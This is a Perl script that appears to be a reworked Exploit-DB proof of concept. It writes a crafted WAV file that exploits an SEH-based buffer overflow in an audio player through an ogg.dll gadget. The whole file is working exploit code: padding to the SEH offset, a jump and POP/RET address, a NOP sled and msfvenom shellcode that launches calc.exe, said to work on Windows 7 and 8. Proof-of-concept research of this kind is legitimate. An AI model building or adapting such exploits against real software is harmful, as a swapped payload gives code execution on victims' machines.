#!/usr/bin/env perl
# original p0c https://www.exploit-db.com/exploits/36465/
# credit to TUNISIAN CYBER
# however he was attemping to vanilla buffer overflow
# in fact it is SEH based exploit
# using the address 0x7C9D30D7 is limit the targets
#which I assume belongs to OS file didn't work on win7
#yes he did find a buffer overflow since the offset reaches ESP before SEH
#in this app, SEH based exploits are more effective and the main vuln in this case should be SEH
#This p0c > win 7s & 8s
# ThreatActor at CoreRed.com
##
my
$file
=
"p0c.wav"
;
my
$buff
=
"A"
x 4116;
# offset to SEH
my
$nseh
=
"\xeb\x06\xff\xff"
;
#dat 8 jmp
my
$seh
=
pack
(
'V'
, 0x66E42A79);
# 66E42A79 5E POP ESI ogg.dll
my
$nop
=
"\x90"
x 28;
#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
my
$shell
=
"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9"
.
"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5"
.
"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e"
.
"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c"
.
"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4"
.
"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c"
.
"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc"
.
"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7"
.
"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90"
.
"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c"
.
"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0"
.
"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f"
.
"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e"
.
"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5"
.
"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e"
.
"\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5"
;
open
(
$FILE
,
">$file"
);
print
$FILE
$buff
.
$nseh
.
$seh
.
$nop
.
$shell
;
close
(
$FILE
);
print
"+++++++++++++++++++\n"
;